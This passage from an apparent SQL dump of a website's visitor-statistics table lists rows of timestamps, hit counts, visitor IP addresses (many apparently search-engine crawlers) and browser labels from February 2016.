0,'66.249.69.3',''),(3731,1455571965,1,1,0,0,'207.46.13.96','other'),(3732,1455571970,1,1,0,0,'66.249.81.208','other'),(3733,1455571985,1,1,0,0,'217.69.143.65','other'),(3734,1455572144,1,0,1,0,'68.180.229.232',''),(3735,1455572640,1,1,0,0,'40.77.167.2','other'),(3736,1455572722,1,0,1,0,'66.249.69.124',''),(3737,1455573160,1,1,0,0,'66.249.91.63','other'),(3738,1455573477,1,1,0,0,'207.46.13.96','other'),(3739,1455573692,1,1,0,0,'180.76.15.143','other'),(3740,1455573706,2,0,2,0,'66.249.69.3',''),(3741,1455573865,1,1,0,0,'5.255.253.89','other'),(3742,1455573921,1,0,1,0,'66.249.69.124',''),(3743,1455574019,1,1,0,0,'141.8.184.19','other'),(3744,1455574023,1,1,0,0,'93.158.152.46','other'),(3745,1455574032,1,1,0,0,'141.8.132.45','other'),(3746,1455574086,2,0,2,0,'66.249.69.11',''),(3747,1455574736,1,1,0,0,'207.46.13.96','other'),(3748,1455575547,1,0,1,0,'68.180.229.232',''),(3749,1455575598,1,1,0,0,'66.249.81.211','other'),(3750,1455575668,1,1,0,0,'207.46.13.96','other'),(3751,1455576149,1,0,1,0,'66.249.69.11',''),(3752,1455576242,1,1,0,0,'141.8.132.10','other'),(3753,1455576251,1,1,0,0,'130.193.50.7','other'),(3754,1455576254,1,1,0,0,'93.158.152.46','other'),(3755,1455576973,1,1,0,0,'157.55.39.248','other'),(3756,1455577270,1,0,1,0,'66.249.69.3',''),(3757,1455577696,1,0,1,0,'66.249.69.11',''),(3758,1455578079,1,1,0,0,'207.46.13.96','other'),(3759,1455578328,1,1,0,0,'157.55.39.138','other'),(3760,1455578357,1,1,0,0,'62.210.215.100','chrome'),(3761,1455578426,1,1,0,0,'93.158.152.5','other'),(3762,1455578430,1,1,0,0,'130.193.51.38','other'),(3763,1455578434,1,1,0,0,'5.255.253.23','other'),(3764,1455578438,1,1,0,0,'141.8.142.12','other'),(3765,1455578442,1,1,0,0,'141.8.132.10','other'),(3766,1455578940,1,0,1,0,'66.249.69.3',''),(3767,1455579057,1,1,0,0,'207.46.13.96','other'),(3768,1455579214,1,0,1,0,'68.180.229.232',''),(3769,1455579239,1,1,0,0,'66.249.81.208','other'),(3770,1455579643,1,0,1,0,'66.249.69.11',''),(3771,1455579752,1,0,1,0,'66.249.75.85',''),(3772,1455579753,1,1,0,0,'141.8.132.71','other'),(3773,1455580043,1,1,0,0,'207.46.13.96','other'),(3774,1455580096,1,0,1,0,'66.249.69.3',''),(3775,1455580242,1,1,0,0,'8.29.198.26','other'),(3776,1455580344,7,7,0,0,'212.106.95.252','other'),(3777,1455580827,2,0,2,0,'68.180.229.232',''),(3778,1455581392,1,1,0,0,'207.46.13.96','other'),(3779,1455581715,5,5,0,0,'46.4.32.75','other'),(3780,1455581781,1,0,1,0,'66.249.69.124',''),(3781,1455581928,1,1,0,0,'80.91.162.99','other'),(3782,1455582273,2,2,0,0,'141.8.132.10','other'),(3783,1455582277,1,1,0,0,'141.8.142.50','other'),(3784,1455582282,2,2,0,0,'141.8.132.34','other'),(3785,1455582366,1,1,0,0,'207.46.13.96','other'),(3786,1455582806,1,0,1,0,'68.180.229.232',''),(3787,1455582906,1,1,0,0,'217.69.143.55','other'),(3788,1455582945,1,0,1,0,'66.249.75.93',''),(3789,1455583077,1,0,1,0,'66.249.69.3',''),(3790,1455583110,3,0,3,0,'66.249.69.124',''),(3791,1455583124,1,1,0,0,'93.158.152.44','other'),(3792,1455583388,1,1,0,0,'217.69.143.42','other'),(3793,1455583672,1,1,0,0,'207.46.13.96','other'),(3794,1455583680,1,1,0,0,'109.75.192.174','msie'),(3795,1455583690,1,1,0,0,'66.249.91.8','other'),(3796,1455583873,1,0,1,0,'68.180.229.232',''),(3797,1455583981,1,1,0,0,'93.158.152.8','other'),(3798,1455583985,1,1,0,0,'141.8.183.1','other'),(3799,1455584568,1,0,1,0,'66.249.69.3',''),(3800,1455584926,1,1,0,0,'141.8.132.10','other'),(3801,1455584930,1,1,0,0,'141.8.184.18','other'),(3802,1455585992,8,8,0,0,'5.255.253.95','other'),(3803,1455585996,16,16,0,0,'141.8.184.18','other'),(3804,1455585999,1,0,1,0,'66.249.69.11',''),(3805,1455586087,2,2,0,0,'178.154.189.17','other'),(3806,1455586095,2,2,0,0,'5.255.253.99','other'),(3807,1455586579,1,0,1,0,'66.249.69.124',''),(3808,1455586746,1,1,0,0,'40.77.167.29','other'),(3809,1455586971,117,117,0,0,'80.91.162.99','other'),(3810,1455587800,186,186,0,0,'82.193.127.15','other'),(3811,1455587927,1,1,0,0,'180.76.15.137','other'),(3812,1455588474,1,0,1,0,'66.249.69.124',''),(3813,1455588490,1,0,1,0,'68.180.229.232',''),(3814,1455588652,1,1,0,0,'40.77.167.29','other'),(3815,1455589954,1,0,1,0,'68.180.229.232',''),(3816,1455590365,1,0,1,0,'66.249.69.124',''),(3817,1455591050,1,1,0,0,'8.29.198.26','other'),(3818,1455591410,1,1,0,0,'82.192.95.184','chrome'),(3819,1455591420,1,1,0,0,'23.239.10.144','chrome'),(3820,1455591453,1,1,0,0,'62.210.215.100','chrome'),(3821,1455591533,1,1,0,0,'180.76.15.15','other'),(3822,1455591663,1,1,0,0,'207.46.13.96','other'),(3823,1455591832,1,0,1,0,'68.180.229.232',''),(3824,1455592438,1,0,1,0,'66.249.69.124',''),(3825,1455592579,1,0,1,0,'66.249.69.3',''),(3826,1455592804,1,1,0,0,'157.55.39.138','other'),(3827,1455593094,1,1,0,0,'217.69.136.208','other'),(3828,1455593719,1,0,1,0,'66.249.69.124',''),(3829,1455594453,1,1,0,0,'66.249.91.63','other'),(3830,1455594591,1,1,0,0,'217.69.143.43','other'),(3831,1455595840,1,1,0,0,'217.69.136.204','other'),(3832,1455595934,1,0,1,0,'68.180.229.232',''),(3833,1455596557,2,0,2,0,'66.249.69.11',''),(3834,1455596632,1,0,1,0,'66.249.69.3',''),(3835,1455596667,2,0,2,0,'66.249.69.124',''),(3836,1455596710,1,1,0,0,'157.55.39.248','other'),(3837,1455597734,1,1,0,0,'157.55.39.138','other'),(3838,1455597909,1,1,0,0,'180.76.15.134','other'),(3839,1455598128,1,0,1,0,'66.249.69.3',''),(3840,1455598481,1,0,1,0,'66.249.69.11',''),(3841,1455598958,2,0,2,0,'66.249.69.124',''),(3842,1455599145,1,1,0,0,'40.77.167.29','other'),(3843,1455599456,1,0,1,0,'66.249.69.3',''),(3844,1455599604,1,1,0,0,'157.55.39.191','other'),(3845,1455599980,2,0,2,0,'68.180.229.232',''),(3846,1455600482,2,0,2,0,'66.249.69.11',''),(3847,1455600921,1,1,0,0,'66.249.81.205','other'),(3848,1455601252,1,0,1,0,'66.249.69.3',''),(3849,1455601559,1,1,0,0,'157.55.39.138','other'),(3850,1455601854,2,0,2,0,'66.249.69.11',''),(3851,1455601897,1,1,0,0,'8.29.198.26','other'),(3852,1455602458,1,0,1,0,'66.249.69.124',''),(3853,1455602487,1,1,0,0,'213.174.7.52','chrome'),(3854,1455602994,2,0,2,0,'66.249.69.11',''),(3855,1455603461,1,1,0,0,'157.55.39.248','other'),(3856,1455603495,2,0,2,0,'66.249.69.124',''),(3857,1455603567,1,1,0,0,'62.210.215.100','chrome'),(3858,1455603816,1,1,0,0,'213.174.7.19','firefox'),(3859,1455604151,1,1,0,0,'212.111.198.100','chrome'),(3860,1455604615,1,1,0,0,'66.249.81.205','other'),(3861,1455604774,71,71,0,0,'136.243.103.165','other'),(3862,1455604957,1,0,1,0,'66.249.69.11',''),(3863,1455605035,2,2,0,0,'213.174.7.17','firefox'),(3864,1455605384,1,1,0,0,'91.196.177.144','chrome'),(3865,1455605421,1,1,0,0,'66.249.91.4','other'),(3866,1455605551,2,0,2,0,'68.180.229.232',''),(3867,1455605655,1,1,0,0,'213.174.7.44','chrome'),(3868,1455605917,1,0,1,0,'66.249.69.124',''),(3869,1455606151,1,1,0,0,'217.69.143.64','other'),(3870,1455606215,1,1,0,0,'66.102.9.104','firefox'),(3871,1455606340,1,1,0,0,'5.255.253.95','other'),(3872,1455606445,1,0,1,0,'66.249.69.3',''),(3873,1455606657,1,1,0,0,'180.76.15.15','other'),(3874,1455606706,1,1,0,0,'213.174.7.16','chrome'),(3875,1455606763,1,0,1,0,'66.249.69.11',''),(3876,1455606827,108,108,0,0,'82.193.127.15','other'),(3877,1455606980,2,0,2,0,'68.180.229.232',''),(3878,1455607601,1,1,0,0,'213.174.7.17','firefox'),(3879,1455607731,1,1,0,0,'95.132.123.98','chrome'),(3880,1455607928,192,192,0,0,'82.193.127.15','other'),(3881,1455608398,1,1,0,0,'213.174.7.16','firefox'),(3882,1455608587,3,3,0,0,'141.8.184.18','other'),(3883,1455608591,2,2,0,0,'141.8.132.45','other'),(3884,1455608604,1,1,0,0,'141.8.132.10','other'),(3885,1455608640,94,94,0,0,'91.194.84.106','other'),(3886,1455608825,1,1,0,0,'213.174.7.16','chrome'),(3887,1455609465,1,1,0,0,'213.174.7.19','firefox'),(3888,1455609516,32,32,0,0,'82.193.127.15','other'),(3889,1455609767,2,2,0,0,'207.46.13.125','other'),(3890,1455609871,300,300,0,0,'80.91.162.99','other'),(3891,1455610166,1,0,1,0,'66.249.69.124',''),(3892,1455610372,2,0,2,0,'66.249.69.11',''),(3893,1455610605,1,1,0,0,'157.55.39.30','other'),(3894,1455610783,1,0,1,0,'66.249.69.3',''),(3895,1455610931,3,3,0,0,'141.8.184.18','other'),(3896,1455610937,1,1,0,0,'141.8.132.10','other'),(3897,1455610939,1,1,0,0,'178.154.189.17','other'),(3898,1455610947,1,1,0,0,'5.255.253.99','other'),(3899,1455611265,1,1,0,0,'213.174.7.17','firefox'),(3900,1455611441,1,1,0,0,'213.174.7.16','chrome'),(3901,1455611515,1,1,0,0,'213.174.7.35','firefox'),(3902,1455611547,1,1,0,0,'78.111.185.39','firefox'),(3903,1455611793,1,1,0,0,'66.249.81.211','other'),(3904,1455612048,1,1,0,0,'195.214.199.245','chrome'),(3905,1455612531,1,1,0,0,'93.73.237.228','firefox'),(3906,1455612538,1,0,1,0,'66.249.69.124',''),(3907,1455612615,1,1,0,0,'46.200.120.110','chrome'),(3908,1455612741,1,1,0,0,'8.29.198.26','other'),(3909,1455612768,1,0,1,0,'66.249.69.3',''),(3910,1455612772,1,0,1,0,'66.249.69.11',''),(3911,1455613141,1,1,0,0,'213.174.7.21','opera'),(3912,1455613493,1,1,0,0,'141.8.184.18','other'),(3913,1455613497,2,2,0,0,'5.255.253.95','other'),(3914,1455613717,1,1,0,0,'62.210.215.100','chrome'),(3915,1455614146,1,1,0,0,'62.80.189.30','other'),(3916,1455614162,1,1,0,0,'213.174.7.21','opera'),(3917,1455614745,2,0,2,0,'66.249.69.124',''),(3918,1455614865,1,0,1,0,'66.249.69.11',''),(3919,1455614875,1,1,0,0,'213.174.7.17','firefox'),(3920,1455615080,1,1,0,0,'23.101.61.176','other'),(3921,1455615082,1,1,0,0,'180.76.15.136','other'),(3922,1455615111,1,1,0,0,'213.174.7.21','opera'),(3923,1455615398,1,1,0,0,'66.249.81.205','other'),(3924,1455615477,1,1,0,0,'217.69.136.206','other'),(3925,1455615737,1,1,0,0,'141.8.184.18','other'),(3926,1455615741,1,1,0,0,'178.154.149.11','other'),(3927,1455615745,1,1,0,0,'93.158.152.9','other'),(3928,1455615749,2,2,0,0,'141.8.183.14','other'),(3929,1455615757,1,1,0,0,'130.193.37.21','other'),(3930,1455615760,1,1,0,0,'5.255.253.100','other'),(3931,1455615765,1,1,0,0,'141.8.132.2','other'),(3932,1455615768,1,1,0,0,'93.158.152.26','other'),(3933,1455616100,1,1,0,0,'66.249.91.4','other'),(3934,1455616182,2,1,1,0,'195.154.209.122',''),(3935,1455616520,2,2,0,0,'207.46.13.91','other'),(3936,1455616924,1,1,0,0,'213.174.7.39','firefox'),(3937,1455616927,2,0,2,0,'68.180.229.232',''),(3938,1455617190,1,1,0,0,'94.179.26.109','firefox'),(3939,1455617256,5,5,0,0,'63.141.226.178','other'),(3940,1455617551,2,0,2,0,'66.249.69.124',''),(3941,1455617665,1,1,0,0,'213.174.7.19','firefox'),(3942,1455617955,1,0,1,0,'66.249.69.3',''),(3943,1455618074,1,1,0,0,'213.174.7.59','chrome'),(3944,1455618079,1,1,0,0,'141.8.184.22','other'),(3945,1455618083,1,1,0,0,'5.255.253.110','other'),(3946,1455618087,1,1,0,0,'141.8.132.44','other'),(3947,1455618214,1,1,0,0,'213.174.7.28','chrome'),(3948,1455618268,2,0,2,0,'68.180.229.232',''),(3949,1455618292,1,1,0,0,'141.0.13.123','chrome'),(3950,1455618305,1,1,0,0,'5.255.253.53','other'),(3951,1455618317,1,1,0,0,'93.158.152.26','other'),(3952,1455618320,1,1,0,0,'141.8.132.66','other'),(3953,1455618324,2,2,0,0,'141.8.184.18','other'),(3954,1455618332,1,1,0,0,'141.8.183.14','other'),(3955,1455618590,2,0,2,0,'66.249.69.124',''),(3956,1455618779,1,1,0,0,'157.55.39.30','other'),(3957,1455618807,1,1,0,0,'213.174.7.17','firefox'),(3958,1455618995,2,0,2,0,'66.249.69.3',''),(3959,1455619094,1,1,0,0,'66.249.81.211','other'),(3960,1455619598,1,1,0,0,'104.209.188.207','other'),(3961,1455619860,1,1,0,0,'130.193.51.45','other'),(3962,1455619864,1,1,0,0,'141.8.132.109','other'),(3963,1455619868,4,4,0,0,'141.8.184.18','other'),(3964,1455619980,1,1,0,0,'180.76.15.134','other'),(3965,1455620035,1,1,0,0,'180.76.15.160','other'),(3966,1455620127,1,1,0,0,'141.0.13.123','chrome'),(3967,1455620145,2,0,2,0,'66.249.69.3',''),(3968,1455620300,2,0,2,0,'68.180.229.232',''),(3969,1455620310,1,1,0,0,'136.243.103.92','other'),(3970,1455620699,1,0,1,0,'66.249.69.124',''),(3971,1455621002,30,30,0,0,'141.8.184.18','other'),(3972,1455621019,10,10,0,0,'141.8.183.14','other'),(3973,1455621061,16,16,0,0,'178.154.149.11','other'),(3974,1455621149,5,5,0,0,'93.158.152.9','other'),(3975,1455621244,4,4,0,0,'5.255.253.53','other'),(3976,1455621447,1,1,0,0,'37.53.76.152','chrome'),(3977,1455621453,2,2,0,0,'130.193.37.21','other'),(3978,1455621835,1,1,0,0,'213.174.7.51','chrome'),(3979,1455621912,1,1,0,0,'95.67.123.236','chrome'),(3980,1455622024,3,3,0,0,'82.193.127.15','other'),(3981,1455622144,4,4,0,0,'109.87.138.56','other'),(3982,1455622330,2,2,0,0,'141.8.183.14','other'),(3983,1455622334,3,3,0,0,'93.158.152.9','other'),(3984,1455622447,2,2,0,0,'178.154.149.11','other'),(3985,1455622452,2,2,0,0,'141.8.184.18','other'),(3986,1455622572,1,1,0,0,'66.249.93.90','firefox'),(3987,1455623473,1,0,1,0,'66.249.75.77',''),(3988,1455623515,1,1,0,0,'66.249.81.205','other'),(3989,1455623531,1,1,0,0,'133.130.79.54','other'),(3990,1455623609,1,1,0,0,'8.29.198.25','other'),(3991,1455623682,1,1,0,0,'62.210.215.100','chrome'),(3993,1455623684,1,1,0,0,'207.46.13.91','other'),(3994,1455623772,1,1,0,0,'46.201.182.76','chrome'),(3995,1455623979,1,1,0,0,'107.178.194.125','chrome'),(3996,1455624270,3,0,3,0,'66.249.69.3',''),(3997,1455624307,2,2,0,0,'178.154.149.11','other'),(3998,1455624311,1,1,0,0,'93.158.152.9','other'),(3999,1455624315,1,1,0,0,'141.8.183.14','other'),(4000,1455624324,2,2,0,0,'141.8.184.18','other'),(4001,1455624892,1,0,1,0,'66.249.69.124',''),(4002,1455625522,1,0,1,0,'68.180.229.232',''),(4003,1455625627,1,1,0,0,'217.69.136.207','other'),(4004,1455626332,1,1,0,0,'213.174.7.22','firefox'),(4005,1455626471,1,1,0,0,'66.249.91.8','other'),(4006,1455626489,1,1,0,0,'93.158.152.9','other'),(4007,1455626493,1,1,0,0,'141.8.132.99','other'),(4008,1455626498,2,2,0,0,'178.154.149.11','other'),(4009,1455626521,1,1,0,0,'157.55.39.150','other'),(4010,1455626660,1,0,1,0,'66.249.69.3',''),(4011,1455626809,1,1,0,0,'194.44.34.105','firefox'),(4012,1455626952,2,2,0,0,'141.8.184.18','other'),(4013,1455626961,1,1,0,0,'130.193.37.21','other'),(4014,1455626965,1,1,0,0,'141.8.183.14','other'),(4015,1455626969,1,1,0,0,'5.255.253.53','other'),(4016,1455627150,1,1,0,0,'92.113.51.69','chrome'),(4017,1455627433,1,1,0,0,'213.174.7.17','firefox'),(4018,1455627546,1,1,0,0,'94.179.124.221','other'),(4019,1455627594,1,1,0,0,'62.141.50.134','other'),(4020,1455628184,1,0,1,0,'68.180.229.232',''),(4021,1455628538,1,1,0,0,'91.196.178.33','firefox'),(4022,1455628560,1,1,0,0,'216.163.188.231','firefox'),(4023,1455628688,1,0,1,0,'66.249.69.124',''),(4024,1455628789,2,0,2,0,'66.249.69.11',''),(4025,1455628879,1,1,0,0,'92.112.17.115','chrome'),(4026,1455628890,2,2,0,0,'5.255.253.53','other'),(4027,1455628895,1,1,0,0,'5.255.253.55','other'),(4028,1455628900,1,1,0,0,'141.8.132.79','other'),(4029,1455628908,1,1,0,0,'5.255.253.9','other'),(4030,1455628912,2,2,0,0,'141.8.184.18','other'),(4031,1455628916,1,1,0,0,'178.154.149.11','other'),(4032,1455628933,1,1,0,0,'195.214.199.245','chrome'),(4033,1455629039,1,1,0,0,'77.52.177.114','chrome'),(4034,1455629394,1,0,1,0,'66.249.69.3',''),(4035,1455629420,1,1,0,0,'195.69.221.54','firefox'),(4036,1455629512,1,1,0,0,'207.46.13.125','other'),(4037,1455629565,1,1,0,0,'157.55.39.58','other'),(4038,1455629831,2,2,0,0,'141.0.13.123','chrome'),(4039,1455630154,1,1,0,0,'213.174.7.19','firefox'),(4040,1455630214,1,0,1,0,'68.180.229.232',''),(4041,1455630401,10,10,0,0,'83.218.232.238','other'),(4042,1455630842,1,1,0,0,'66.249.81.208','other'),(4043,1455630894,1,1,0,0,'141.0.13.123','chrome'),(4044,1455631112,1,1,0,0,'178.154.149.11','other'),(4045,1455631116,1,1,0,0,'141.8.183.14','other'),(4046,1455631122,1,1,0,0,'5.255.253.100','other'),(4047,1455631396,1,1,0,0,'213.174.7.16','firefox'),(4048,1455631685,1,1,0,0,'37.55.225.195','chrome'),(4049,1455631840,1,1,0,0,'37.52.35.135','firefox'),(4050,1455631979,1,1,0,0,'213.174.7.33','chrome'),(4051,1455632003,3,0,3,0,'66.249.69.11',''),(4052,1455632631,1,0,1,0,'66.249.69.124',''),(4053,1455632655,1,1,0,0,'157.55.39.150','other'),(4054,1455633183,2,2,0,0,'141.0.13.123','chrome'),(4055,1455633226,1,1,0,0,'62.210.215.100','chrome'),(4056,1455633577,1,1,0,0,'37.55.130.72','firefox'),(4057,1455633903,2,0,2,0,'68.180.229.232',''),(4058,1455634180,10,10,0,0,'83.218.232.238','other'),(4059,1455634365,1,1,0,0,'66.249.81.205','other'),(4060,1455634477,1,1,0,0,'8.29.198.26','other'),(4061,1455634497,1,0,1,0,'66.249.69.124',''),(4062,1455634557,1,1,0,0,'5.255.253.53','other'),(4063,1455634561,1,1,0,0,'130.193.37.21','other'),(4064,1455634565,1,1,0,0,'130.193.51.43','other'),(4065,1455634569,1,1,0,0,'5.255.253.9','other'),(4066,1455634573,1,1,0,0,'141.8.132.97','other'),(4067,1455634575,1,1,0,0,'5.255.253.10','other'),(4068,1455635091,1,1,0,0,'207.46.13.91','other'),(4069,1455635201,1,1,0,0,'213.174.7.45','chrome'),(4070,1455635330,1,1,0,0,'37.53.161.196','chrome'),(4071,1455635449,2,2,0,0,'157.55.39.150','other'),(4072,1455636171,1,1,0,0,'141.8.132.99','other'),(4073,1455636175,1,1,0,0,'141.8.132.79','other'),(4074,1455636178,1,1,0,0,'93.158.152.9','other'),(4075,1455636182,3,3,0,0,'178.154.149.11','other'),(4076,1455636701,1,1,0,0,'141.8.184.18','other'),(4077,1455636704,1,1,0,0,'130.193.37.21','other'),(4078,1455636708,1,1,0,0,'130.193.51.85','other'),(4079,1455636711,1,1,0,0,'141.8.142.8','other'),(4080,1455636715,1,1,0,0,'141.8.132.2','other'),(4081,1455636966,1,1,0,0,'185.11.31.21','chrome'),(4082,1455637045,1,0,1,0,'66.249.69.124',''),(4083,1455637333,1,0,1,0,'68.180.229.232',''),(4084,1455637391,1,1,0,0,'66.249.91.8','other'),(4085,1455637986,73,73,0,0,'149.202.48.176','other'),(4086,1455638205,2,2,0,0,'141.0.13.123','chrome'),(4087,1455638431,1,0,1,0,'68.180.229.232',''),(4088,1455638819,1,1,0,0,'178.92.64.37','firefox'),(4089,1455638845,1,0,1,0,'66.249.69.124',''),(4090,1455639169,1,1,0,0,'213.174.7.17','firefox'),(4091,1455639458,1,1,0,0,'141.8.142.41','other'),(4092,1455639604,1,1,0,0,'62.210.215.100','chrome'),(4093,1455640038,2,0,2,0,'66.249.69.3',''),(4094,1455640138,2,2,0,0,'95.135.240.47','chrome'),(4095,1455640268,1,1,0,0,'91.225.5.29','chrome'),(4096,1455640710,1,1,0,0,'130.193.51.85','other'),(4097,1455640713,2,2,0,0,'130.193.37.21','other'),(4098,1455640768,1,0,1,0,'66.249.69.11',''),(4099,1455641030,1,1,0,0,'178.92.64.37','firefox'),(4100,1455641083,1,1,0,0,'66.249.93.94','firefox'),(4101,1455641529,1,1,0,0,'66.249.81.211','other'),(4102,1455641550,1,1,0,0,'207.46.13.125','other'),(4103,1455642061,1,1,0,0,'157.55.39.58','other'),(4104,1455642232,2,2,0,0,'141.0.13.123','chrome'),(4105,1455642356,1,0,1,0,'66.249.69.124',''),(4106,1455642857,1,1,0,0,'141.8.142.10','other'),(4107,1455642860,1,1,0,0,'130.193.37.21','other'),(4108,1455642864,1,1,0,0,'141.8.132.76','other'),(4109,1455642885,1,1,0,0,'217.69.136.209','other'),(4110,1455642967,1,0,1,0,'66.249.69.11',''),(4111,1455643050,1,1,0,0,'92.113.188.127','firefox'),(4112,1455643314,1,1,0,0,'91.196.178.34','chrome'),(4113,1455643393,1,0,1,0,'68.180.229.232',''),(4114,1455643681,2,0,2,0,'66.249.69.124',''),(4115,1455643727,2,2,0,0,'141.0.13.123','chrome'),(4116,1455643756,1,1,0,0,'207.46.13.91','other'),(4117,1455643968,1,1,0,0,'62.210.215.100','chrome'),(4118,1455644303,1,0,1,0,'66.249.69.3',''),(4119,1455644395,1,1,0,0,'92.113.188.127','other'),(4120,1455644423,1,1,0,0,'217.69.136.210','other'),(4121,1455644675,1,1,0,0,'207.46.13.125','other'),(4122,1455644709,2,0,2,0,'66.249.69.11',''),(4123,1455645186,1,1,0,0,'66.249.81.208','other'),(4124,1455645321,1,0,1,0,'66.249.69.3',''),(4125,1455645381,1,1,0,0,'8.29.198.25','other'),(4126,1455645538,2,2,0,0,'213.174.7.16','other'),(4127,1455645771,2,2,0,0,'141.8.183.14','other'),(4128,1455645777,1,1,0,0,'178.154.149.11','other'),(4129,1455646171,2,0,2,0,'66.249.69.124',''),(4130,1455646769,1,0,1,0,'66.249.69.11',''),(4131,1455647169,3,3,0,0,'178.62.251.206','other'),(4132,1455647292,1,1,0,0,'92.113.188.127','firefox'),(4133,1455647597,1,0,1,0,'66.249.69.124',''),(4134,1455647964,1,0,1,0,'68.180.229.232',''),(4135,1455648021,1,1,0,0,'141.8.142.41','other'),(4136,1455648024,1,1,0,0,'130.193.51.85','other'),(4137,1455648028,3,3,0,0,'141.8.184.18','other'),(4138,1455648115,1,1,0,0,'178.62.251.206','other'),(4139,1455648140,3,3,0,0,'141.8.132.99','other'),(4140,1455648142,2,2,0,0,'130.193.51.45','other'),(4141,1455648145,2,2,0,0,'141.8.132.2','other'),(4142,1455648149,1,1,0,0,'141.8.183.14','other'),(4143,1455648166,1,1,0,0,'141.8.184.11','other'),(4144,1455648170,1,1,0,0,'130.193.51.81','other'),(4145,1455648184,1,1,0,0,'207.46.13.125','other'),(4146,1455648210,2,2,0,0,'5.255.253.55','other'),(4147,1455648270,1,1,0,0,'5.255.253.9','other'),(4148,1455648273,2,2,0,0,'141.8.184.22','other'),(4149,1455648276,1,1,0,0,'130.193.51.102','other'),(4150,1455648281,1,1,0,0,'141.8.142.88','other'),(4151,1455648335,1,1,0,0,'130.193.37.27','other'),(4152,1455648371,1,1,0,0,'5.255.253.110','other'),(4153,1455648374,1,1,0,0,'5.255.253.100','other'),(4154,1455648495,1,1,0,0,'217.69.136.209','other'),(4155,1455648526,1,0,1,0,'66.249.69.124',''),(4156,1455648570,1,1,0,0,'66.249.91.8','other'),(4157,1455648757,1,1,0,0,'178.92.71.170','firefox'),(4158,1455648967,1,1,0,0,'217.69.136.205','other'),(4159,1455649473,1,0,1,0,'66.249.69.11',''),(4160,1455649601,1,0,1,0,'66.249.69.124',''),(4161,1455649800,1,0,1,0,'68.180.229.232',''),(4162,1455649886,1,0,1,0,'66.249.69.3',''),(4163,1455650523,2,0,2,0,'66.249.69.11',''),(4164,1455651428,1,0,1,0,'66.249.69.11',''),(4165,1455651775,1,1,0,0,'177.75.16.71','other'),(4166,1455651949,2,2,0,0,'95.213.141.126','opera'),(4167,1455652277,1,0,1,0,'66.249.69.3',''),(4168,1455652429,1,0,1,0,'66.249.69.124',''),(4169,1455652494,1,1,0,0,'66.249.81.205','other'),(4170,1455652778,2,0,2,0,'66.249.69.11',''),(4171,1455652996,1,1,0,0,'178.136.125.3','firefox'),(4172,1455653129,2,2,0,0,'141.8.183.14','other'),(4173,1455653131,17,17,0,0,'141.8.184.18','other'),(4174,1455653134,11,11,0,0,'178.154.149.11','other'),(4175,1455653156,1,1,0,0,'178.154.189.6','other'),(4176,1455653177,1,1,0,0,'141.8.132.44','other'),(4177,1455653180,1,1,0,0,'5.255.253.10','other'),(4178,1455653194,1,1,0,0,'5.255.253.9','other'),(4179,1455653205,2,0,2,0,'68.180.229.232',''),(4180,1455653206,1,1,0,0,'5.255.253.30','other'),(4181,1455653208,1,1,0,0,'141.8.142.8','other'),(4182,1455653211,1,1,0,0,'5.255.253.94','other'),(4183,1455654189,2,2,0,0,'93.74.206.122','other'),(4184,1455654292,1,1,0,0,'62.210.215.100','chrome'),(4185,1455654499,1,1,0,0,'130.185.109.226','other'),(4186,1455654664,3,0,3,0,'66.249.69.3',''),(4187,1455655255,2,0,2,0,'66.249.69.124',''),(4188,1455655301,1,0,1,0,'66.249.69.11',''),(4189,1455655408,1,1,0,0,'217.69.136.203','other'),(4190,1455656074,2,2,0,0,'141.8.184.18','other'),(4191,1455656193,1,1,0,0,'8.29.198.25','other'),(4192,1455656224,2,0,2,0,'68.180.229.232',''),(4193,1455656918,1,1,0,0,'37.53.245.23','firefox'),(4194,1455657517,1,0,1,0,'66.249.69.124',''),(4195,1455657838,1,1,0,0,'207.46.13.91','other'),(4196,1455658044,1,0,1,0,'68.180.229.232',''),(4197,1455658405,1,1,0,0,'217.69.136.209','other'),(4198,1455659081,1,1,0,0,'66.249.91.8','other'),(4199,1455660230,1,0,1,0,'66.249.69.11',''),(4200,1455661378,2,0,2,0,'66.249.69.11',''),(4201,1455661549,1,1,0,0,'178.154.149.11','other'),(4202,1455661551,1,1,0,0,'141.8.184.18','other'),(4203,1455662329,238,238,0,0,'178.151.143.163','other'),(4204,1455662339,80,80,0,0,'207.46.13.125','other'),(4205,1455662369,58,58,0,0,'157.55.39.58','other'),(4206,1455662401,54,54,0,0,'157.55.39.150','other'),(4207,1455662578,1,0,1,0,'66.249.69.11',''),(4208,1455662710,68,68,0,0,'207.46.13.91','other'),(4209,1455663002,1,0,1,0,'68.180.229.232',''),(4210,1455663206,1,0,1,0,'66.249.69.124',''),(4211,1455664078,1,1,0,0,'207.46.13.91','other'),(4212,1455664325,2,0,2,0,'68.180.229.232',''),(4213,1455664512,2,2,0,0,'217.20.168.185','firefox'),(4214,1455665121,1,0,1,0,'66.249.69.3',''),(4215,1455665152,2,2,0,0,'207.46.13.91','other'),(4216,1455665377,1,1,0,0,'62.210.215.100','chrome'),(4217,1455666915,1,1,0,0,'180.76.15.155','other'),(4218,1455666992,1,1,0,0,'207.46.13.91','other'),(4219,1455666995,1,1,0,0,'62.210.215.100','chrome'),(4220,1455667000,1,1,0,0,'8.29.198.25','other'),(4221,1455667711,1,0,1,0,'68.180.229.232',''),(4222,1455667966,1,1,0,0,'207.46.13.91','other'),(4223,1455668096,5,0,5,0,'66.249.69.3',''),(4224,1455668163,1,1,0,0,'157.55.39.150','other'),(4225,1455668317,1,1,0,0,'217.69.136.203','other'),(4226,1455668420,1,1,0,0,'80.91.162.99','other'),(4227,1455668651,1,0,1,0,'68.180.229.232',''),(4228,1455668852,1,1,0,0,'180.76.15.24','other'),(4229,1455669168,1,0,1,0,'66.249.69.124',''),(4230,1455669247,1,0,1,0,'66.249.69.11',''),(4231,1455669523,1,0,1,0,'66.249.69.3',''),(4232,1455669785,1,1,0,0,'157.55.39.150','other'),(4233,1455670205,1,0,1,0,'66.249.69.124',''),(4234,1455670411,1,1,0,0,'66.249.91.63','other'),(4235,1455670742,1,0,1,0,'68.180.229.232',''),(4236,1455671732,1,0,1,0,'68.180.229.232',''),(4237,1455671997,1,0,1,0,'66.249.69.3',''),(4238,1455672293,2,0,2,0,'66.249.69.124',''),(4239,1455673255,2,0,2,0,'66.249.69.11',''),(4240,1455674114,1,0,1,0,'66.249.69.3',''),(4241,1455674474,1,1,0,0,'207.46.13.91','other'),(4242,1455674511,1,0,1,0,'66.249.69.124',''),(4243,1455674835,1,0,1,0,'66.249.69.11',''),(4244,1455675133,1,1,0,0,'157.55.39.150','other'),(4245,1455677657,1,0,1,0,'66.249.69.3',''),(4246,1455677752,1,1,0,0,'62.210.215.100','chrome'),(4247,1455677876,1,1,0,